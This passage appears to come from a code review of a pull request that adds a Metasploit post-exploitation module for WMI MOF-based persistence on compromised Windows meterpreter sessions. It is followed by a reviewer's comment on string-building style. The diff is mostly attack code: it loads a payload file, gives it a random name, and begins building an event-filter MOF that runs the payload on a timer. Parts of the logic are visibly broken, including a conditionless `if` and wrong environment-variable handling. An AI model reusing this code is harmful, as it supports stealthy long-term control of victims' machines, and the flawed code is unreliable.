modules/post/windows/manage/mof_persistence.rb

```diff
@@ -0,0 +1,190 @@
+      'License'              => MSF_LICENSE,
+      'Platform'             => ['win'],
+      'SessionTypes'         => ['meterpreter'],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'         => "none"
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'Author'               => [
+        'Created by khr0x40sh',
+        'Upgraded by F0rb1dd3n'
+        ],
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptInt.new( 'INTERVAL', [true, 'Interval beween callbacks', 60]),
+        OptString.new('CLASSNAME', [false, 'MOF Event and CommandLine Consumer Class Name (default: random)']),
+        OptString.new('RNAME', [false, 'Name of the file that will be called by mof event (default: random)']),
+        OptString.new('FILE', [true, 'Path of the file with the payload that will be called by mof event']),
+        OptString.new('FILETYPE', [false, 'Extention of the file that will be called by mof event (default: exe)', 'exe']),
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('W_PATH',  [false, 'PATH to write temporary MOF', '%TEMP%' ]),
+        OptBool.new(  'DELETE',  [false, 'Delete MOF after execution', true ]),
+        OptBool.new(  'DRY_RUN', [false, 'Only show what would be done', false ]),
+        OptInt.new('TIMEOUT',    [false, 'Execution timeout', 15]),
+      ])
+
+  end
+
+  def run
+
+    return 0 if ! (session.type == "meterpreter")
+
+    path=""
+    if datastore['W_PATH'].include? "%"
+        path1 = datastore['W_PATH']
+        path2 = path1.split("\\")
+
+        path2.each do |i|
+                if i.include? "%"
+                        i.gsub!("%","")
+                        i =session.sys.config.getenv(path1)
+                end
+                path.concat("#{i}\\")
+        end
+    else
+        path = datastore['W_PATH']
+    end
+
+    @arch = session.sys.config.getenv('ARCH')
+
+    rexename = datastore['RNAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+
+    mof_class_name = datastore['CLASSNAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    datastore['DisablePayloadHandler'] = true
+
+    #payl = generate_payload_exe
+    payl = File.read(datastore['FILE'])
+
+    if datastore['FILETYPE'] == 'bat'
+      bin_file_name = path + "\\" + rexename + ".bat"
+    else
+      if
+      bin_file_name = path + "\\" + rexename + ".exe"
+      else
+        bin_file_name = path + "\\" + rexename + "." + datastore['FILE']
+      end
+    end
+
+    print_status("Running MOF persistence script...\n")
+    print_status("Using interval #{datastore['INTERVAL']} seconds")
+
+    mof_header="#pragma namespace(\"\\\\.\\root\\subscription\")\n"
+    mof_filter ="instance of __EventFilter as $FILTER\n"
```

Comment:
It's preferred to use Ruby's quote mechanism for large blocks of text instead of lots of string concats. See [here](https://github.com/rapid7/metasploit-framework/blob/ae684c100259c3c0a2396bb8c677eda30d125bdf/lib/msf/core/payload/windows/reverse_tcp.rb#L118) for an example.